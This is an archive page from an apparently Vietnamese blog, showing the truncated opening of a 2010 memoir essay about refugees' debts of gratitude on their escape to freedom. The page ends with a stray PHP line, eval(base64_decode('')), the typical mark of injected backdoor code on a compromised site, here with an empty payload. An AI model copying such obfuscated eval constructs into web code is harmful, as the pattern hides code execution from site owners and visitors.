Archive for September 17th, 2010

Bút Ký Họp Mặt Quảng Đà 2010 chủ đề

Bút Ký Họp Mặt Quảng Đà 2010 chủ đề “35 Năm Hành Trình Tìm Tự Do”

Bắt đầu từ những món nợ. Nợ đủ thứ và nợ rất nhiều người. Nợ chị bán cháo lòng ở góc đường. Nợ anh bán dầu máy đầu xóm. Nợ người chèo chiếc “taxi” đưa mình ra “cá lớn”. Nợ Cao Ủy Tỵ Nạn chiếc vé máy bay. Nợ ngư

09.17.2010 | Ký-Truyện-Tùy Bút |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>